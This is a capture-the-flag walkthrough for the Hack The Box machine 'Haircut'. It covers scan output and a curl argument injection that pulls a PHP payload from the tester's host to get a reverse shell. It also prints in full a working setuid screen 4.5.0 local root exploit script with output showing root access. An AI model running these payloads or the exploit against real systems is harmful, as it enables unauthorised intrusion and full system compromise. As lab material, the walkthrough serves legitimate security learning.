Difficulty Rating:

Machine: Haircut
OS: Linux
IP: 10.10.10.24

  • Nmap scan for TCP
$ nmap -A -sV -Pn  10.10.10.24 

Starting Nmap 7.50 ( https://nmap.org ) at 2017-07-31 10:44 IST
Nmap scan report for 10.10.10.24
Host is up (0.19s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e9:75:c1:e4:b3:63:3c:93:f2:c6:18:08:36:48:ce:36 (RSA)
|   256 87:00:ab:a9:8f:6f:4b:ba:fb:c6:7a:55:a8:60:b2:68 (ECDSA)
|_  256 b6:1b:5c:a9:26:5c:dc:61:b7:75:90:6c:88:51:6e:54 (EdDSA)
80/tcp open  http    nginx 1.10.0 (Ubuntu)
|_http-server-header: nginx/1.10.0 (Ubuntu)
|_http-title:  HTB Hairdresser 
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.42 seconds
  • Nmap scan for UDP
$ sudo nmap -A -sV -Pn -sU  10.10.10.24 

Starting Nmap 7.50 ( https://nmap.org ) at 2017-07-31 10:54 IST
Nmap scan report for 10.10.10.24
Host is up (0.18s latency).
Not shown: 996 closed ports
PORT      STATE         SERVICE VERSION
17592/udp open|filtered unknown
19075/udp open|filtered unknown
19728/udp open|filtered unknown
31731/udp open|filtered unknown
Too many fingerprints match this host to give specific OS details
Network Distance: 2 hops

TRACEROUTE (using port 39217/udp)
HOP RTT       ADDRESS
1   214.64 ms 10.10.14.1
2   217.71 ms 10.10.10.24

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1137.82 seconds
  • Nikto
nikto -h http://10.10.10.24
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.24
+ Target Hostname:    10.10.10.24
+ Target Port:        80
+ Start Time:         2017-07-31 11:16:20 (GMT5.5)
---------------------------------------------------------------------------
+ Server: nginx/1.10.0 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x59198410 0x90 
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-3092: /test.html: This might be interesting...
+ 7499 requests: 0 error(s) and 5 item(s) reported on remote host
+ End Time:           2017-07-31 11:42:33 (GMT5.5) (1573 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
  • Dirb
dirb http://10.10.10.24

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Mon Jul 31 11:09:15 2017
URL_BASE: http://10.10.10.24/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.10.10.24/ ----
+ http://10.10.10.24/index.html (CODE:200|SIZE:144)                                                                                    
==> DIRECTORY: http://10.10.10.24/uploads/                                                                         
                                                                                                                                                                                             
---- Entering directory: http://10.10.10.24/uploads/ ----
                                                                                                                                                                                             
-----------------
END_TIME: Mon Jul 31 11:40:44 2017
DOWNLOADED: 9224 - FOUND: 1
  • There’s another file available name exposed.php
  • Unfortunately, I didn’t find it by enumeration. Got it from a friend
  • Visit http://10.10.10.24/exposed.php
  • You will find it executes a curl script behind.
  • There’s folder called /uploads available. Let’s upload our paylaod here.
  • In the input box, enter
http://10.10.15.16/payload.txt -o uploads/payload.php
  • Execute the payload by visiting http://10.10.15.16/uploads/payload.php
  • Open msfconsole and connect using exploit/multi/handler exploit
  • Own user

  • To own system check for SUID
$ find / -perm -4000 -user root -exec ls -ld {} \; 2>/dev/null
-rwsr-xr-x 1 root root 142032 Jan 28  2017 /bin/ntfs-3g
-rwsr-xr-x 1 root root 44680 May  7  2014 /bin/ping6
-rwsr-xr-x 1 root root 30800 Jul 12  2016 /bin/fusermount
-rwsr-xr-x 1 root root 40128 May  4 10:33 /bin/su
-rwsr-xr-x 1 root root 40152 Dec 16  2016 /bin/mount
-rwsr-xr-x 1 root root 44168 May  7  2014 /bin/ping
-rwsr-xr-x 1 root root 27608 Dec 16  2016 /bin/umount
-rwsr-xr-x 1 root root 136808 Jan 20  2017 /usr/bin/sudo
-rwsr-xr-x 1 root root 23376 Jan 18  2016 /usr/bin/pkexec
-rwsr-xr-x 1 root root 32944 May  4 10:33 /usr/bin/newuidmap
-rwsr-xr-x 1 root root 39904 May  4 10:33 /usr/bin/newgrp
-rwsr-xr-x 1 root root 32944 May  4 10:33 /usr/bin/newgidmap
-rwsr-xr-x 1 root root 75304 May  4 10:33 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 54256 May  4 10:33 /usr/bin/passwd
-rwsr-xr-x 1 root root 1588648 May 19 07:27 /usr/bin/screen-4.5.0
-rwsr-xr-x 1 root root 40432 May  4 10:33 /usr/bin/chsh
-rwsr-xr-x 1 root root 49584 May  4 10:33 /usr/bin/chfn
-rwsr-xr-x 1 root root 38984 Mar  7 21:18 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
-rwsr-xr-- 1 root messagebus 42992 Jan 12  2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 208680 Apr 29 10:39 /usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root 10232 Mar 27 17:56 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 428240 Mar 16 15:04 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 14864 Jan 18  2016 /usr/lib/policykit-1/polkit-agent-helper-1
  • Screen-4.5.00 is vulnerable.
  • Use the below exploit to gain root permissions

  • Exploit
#!/bin/bash
# screenroot.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
# HACK THE PLANET
# ~ infodox (25/1/2017) 
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so... 
/tmp/rootshell

Note: If the above exploit does not work out-of-the-box, compile libhax.c and rootshell.c on local machine and upload both files to /tmp/ of attacker machine. Then upload file with the following bash code in /var/www/html/uploads

echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so... 
/tmp/rootshell
  • Give execute permissions and execute it
./rootshell.sh
[+] Now we create our /etc/ld.so.preload file...
[+] Triggering...
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
[+] done!
No Sockets found in /tmp/screens/S-www-data.

id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
cat /root/root.txt
XXXXXXX
User and Root owned!!

Share the fun!